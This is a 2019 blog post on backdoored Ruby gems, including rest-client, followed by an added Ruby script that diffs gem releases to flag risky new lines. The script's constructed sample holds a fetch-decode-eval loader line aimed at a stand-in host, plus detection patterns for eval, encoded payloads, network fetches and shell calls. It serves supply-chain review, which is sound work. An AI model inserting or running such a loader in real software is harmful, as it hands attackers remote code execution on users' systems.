Monday, August 26, 2019

Rubys in the Rough

    The Ruby programming language is a high-level, general-purpose language that was designed to be object-oriented at a time when its creator found the existing object-oriented options few and lacking. The language uses a package manager called RubyGems to provide a standardized platform for managing programs and libraries.

    Thousands of users are potentially affected by vulnerabilities in 18 versions of Ruby libraries. The compromised versions contained code that launched crypto miners inside other Ruby projects. They also collected data, including credentials, payment details, service-provider information and the entire database, and delivered it to a server in Ukraine. The backdoor additionally let an attacker send cookies through it and remotely execute code and commands. The code was inserted into several crypto-mining libraries as well as a few utilities such as omniauth_amazon and cron_parser. These are all relatively small packages, but the malicious actor also tried to push his updates onto rest-client, a much more widely used and scrutinized project; there the backdoor was identified within hours, and the other projects where it had been inserted were then discovered as well.
    Because it was identified so quickly, there were only around a thousand downloads of the latest update for this older version of rest-client. However, the smaller libraries had the backdoor in place for over a month. Thankfully, the total downloads for all of those libraries combined numbered fewer than 3000. We last saw such dependency attacks in the strong_password library, which downloaded a payload instead of holding the malicious code itself.
    With crowd-sourced and open-source projects, one must take extra precautions and properly evaluate the diffs between updates before committing to such a solution. Without due diligence, one could unknowingly insert bad code into one's own projects or rely on bad dependencies that compromise both developer data and user data in one's products. Relying on descriptions, and on faith that a widely used gem must be safe, is a disservice to you as well as to the community at large.
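One way to do that review in practice, as an added example that is not part of the original post and not code from any of the gems mentioned: compare the files of two releases, look only at the lines the new release introduces, and flag constructs that rarely belong in a routine update (dynamic `eval`, decoding of encoded blobs, outbound network fetches, shell execution). It also checks whether a "new" release sits on an older version series than the current one, the situation the post describes for rest-client. The gem name `example-client`, its file contents and its version numbers are all constructed for this example; the injected line mimics the general shape of a fetch-decode-execute loader without pointing anywhere real.

```ruby
require 'rubygems' # for Gem::Version (loaded by default, required here to be explicit)

# Constructed sample: file contents of two releases of a hypothetical gem "example-client".
# In real use these hashes would come from unpacking the two .gem files (data.tar.gz).
OLD_RELEASE = {
  "lib/example/version.rb" => "module Example\n  VERSION = '1.4.2'\nend\n",
  "lib/example/payload.rb" => <<~RUBY,
    module Example
      module Payload
        def self.encode(body)
          body.to_s
        end
      end
    end
  RUBY
}.freeze

NEW_RELEASE = {
  "lib/example/version.rb" => "module Example\n  VERSION = '1.4.3'\nend\n",
  "lib/example/payload.rb" => <<~RUBY,
    module Example
      module Payload
        def self.encode(body)
          body.to_s
        end
        # constructed: the shape of an injected loader that fetches, decodes and runs remote code
        eval(Base64.decode64(Net::HTTP.get(URI("https://example.invalid/stage"))))
      end
    end
  RUBY
  "lib/example/helper.rb" => "module Example\n  def self.run(cmd)\n    system(cmd)\n  end\nend\n",
}.freeze

# Constructs that deserve a human look when they appear in a point release.
RISKY_PATTERNS = {
  dynamic_eval:    /\b(?:eval|instance_eval|class_eval|module_eval)\b/,
  encoded_payload: /Base64\.(?:decode64|strict_decode64|urlsafe_decode64)|unpack\(["']m/,
  outbound_fetch:  /Net::HTTP|URI\.open|open-uri|TCPSocket|Socket\.tcp/,
  shell_execution: /\bsystem\(|\bspawn\(|IO\.popen|Kernel\.exec|%x\(|`/,
}.freeze

# Which paths were added, removed or modified between the two releases.
def changed_paths(old_files, new_files)
  {
    added:   new_files.keys - old_files.keys,
    removed: old_files.keys - new_files.keys,
    changed: (old_files.keys & new_files.keys).select { |p| old_files[p] != new_files[p] },
  }
end

# Lines present in the new source but absent from the old one (set difference;
# coarse, but sufficient for triage of what an update introduces).
def lines_introduced(old_src, new_src)
  new_src.to_s.lines.map(&:chomp) - old_src.to_s.lines.map(&:chomp)
end

# Scan every introduced line in added or modified files against RISKY_PATTERNS.
def risky_findings(old_files, new_files)
  paths = changed_paths(old_files, new_files)
  findings = []
  (paths[:added] + paths[:changed]).sort.each do |path|
    lines_introduced(old_files[path], new_files[path]).each do |line|
      next if line.strip.start_with?("#") # comments cannot execute; skip them
      RISKY_PATTERNS.each do |name, re|
        findings << { path: path, pattern: name, line: line.strip } if line.match?(re)
      end
    end
  end
  findings
end

# True when a freshly published version is older than the gem's current latest,
# i.e. it was pushed onto a stale release series rather than the main line.
def stale_series_release?(candidate, latest_known)
  Gem::Version.new(candidate) < Gem::Version.new(latest_known)
end

if __FILE__ == $PROGRAM_NAME
  puts "stale-series release: #{stale_series_release?('1.4.3', '2.0.0')}"
  risky_findings(OLD_RELEASE, NEW_RELEASE).each do |f|
    puts "#{f[:path]}: #{f[:pattern]} -> #{f[:line]}"
  end
end
```

Run against the sample, the scan reports one shell-execution line in the newly added helper and three hits (eval, decode, network fetch) on the single injected line in `payload.rb`, while the version bump itself produces nothing. The point is not that any one pattern proves compromise, but that a point release of a small utility should rarely introduce any of them, so every hit is worth reading before the update is adopted.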